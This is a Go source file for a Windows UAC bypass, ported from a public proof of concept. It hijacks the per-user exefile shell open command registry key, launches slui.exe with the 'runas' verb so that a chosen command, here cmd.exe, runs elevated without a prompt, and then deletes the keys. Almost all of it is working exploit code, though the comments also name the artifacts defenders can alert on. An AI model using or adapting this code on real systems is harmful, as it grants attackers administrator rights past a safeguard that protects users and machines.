slui.exe UAC bypass Go implementation
// UAC bypass ported from https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation/blob/master/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp
package main
import (
"syscall"
"time"
"unsafe"
"golang.org/x/sys/windows/registry"
)
// createRegistryKey creates keyPath under HKEY_CURRENT_USER (or opens it if it
// already exists) with SET_VALUE|QUERY_VALUE access and reports whether the
// call succeeded. Both the returned handle and the "already existed" flag from
// registry.CreateKey are discarded, so the handle is never closed here.
func createRegistryKey(keyPath string) error {
	_, _, createErr := registry.CreateKey(registry.CURRENT_USER, keyPath, registry.SET_VALUE|registry.QUERY_VALUE)
	return createErr
}
// deleteRegistryKey opens keyPath under HKEY_CURRENT_USER and deletes its
// direct subkey keyName. An open failure is returned as-is; otherwise the
// result of registry.DeleteKey is returned. The parent handle is not closed.
func deleteRegistryKey(keyPath, keyName string) (err error) {
	var parent registry.Key
	parent, err = registry.OpenKey(registry.CURRENT_USER, keyPath, registry.QUERY_VALUE|registry.SET_VALUE)
	if err != nil {
		return err
	}
	return registry.DeleteKey(parent, keyName)
}
// bypassUAC writes command as the default value of
// HKCU\Software\Classes\exefile\shell\open\command, launches slui.exe through
// ShellExecuteW with the "runas" verb, waits three seconds and then removes the
// keys it created. From a defender's view the observable artifacts are the
// per-user write to that exefile handler key and slui.exe spawning an
// unexpected child; both are the points to alert on.
//
// The returned error is of limited use: the err assigned by shellExecuteW.Call
// (see below) is always non-nil, so this function reports a non-nil error even
// when the launch succeeded.
func bypassUAC(command string) (err error) {
	regKeyStr := `Software\Classes\exefile\shell\open\command`
	// Error ignored: if creation fails, OpenKey below fails and reports it.
	createRegistryKey(regKeyStr)
	// key is never closed; the handle lives until process exit.
	key, err := registry.OpenKey(registry.CURRENT_USER, regKeyStr, registry.SET_VALUE|registry.QUERY_VALUE)
	if err != nil {
		return err
	}
	// Empty value name = the key's (Default) value, which is the handler string.
	err = key.SetStringValue("", command)
	if err != nil {
		return
	}
	// Must* variants panic if the DLL or export cannot be resolved.
	shell32 := syscall.MustLoadDLL("Shell32.dll")
	shellExecuteW := shell32.MustFindProc("ShellExecuteW")
	// Conversion errors ignored; UTF16PtrFromString only fails on an interior NUL.
	runasStr, _ := syscall.UTF16PtrFromString("runas")
	sluiStr, _ := syscall.UTF16PtrFromString("C:\\Windows\\System32\\slui.exe")
	// ShellExecuteW(hwnd=0, verb="runas", file=slui.exe, params=0, dir=0, nShowCmd=1).
	// Proc.Call's error result is always non-nil (a syscall.Errno, zero on
	// success), and it overwrites the named result err here.
	r1, _, err := shellExecuteW.Call(uintptr(0), uintptr(unsafe.Pointer(runasStr)), uintptr(unsafe.Pointer(sluiStr)), uintptr(0), uintptr(0), uintptr(1))
	// ShellExecuteW signals failure with a return value <= 32.
	if r1 < 32 {
		return
	}
	// Wait for the command to trigger
	time.Sleep(time.Second * 3)
	// Clean up. Errors from both deletions are ignored, so a failed cleanup
	// leaves the handler key in place.
	deleteRegistryKey(`Software\Classes\exefile\shell\open\`, "command")
	deleteRegistryKey(`Software\Classes\exefile\shell\`, "open")
	return
}
// main runs bypassUAC with a hard-coded cmd.exe path and discards its error.
func main() {
	const target = "c:\\windows\\system32\\cmd.exe"
	_ = bypassUAC(target)
}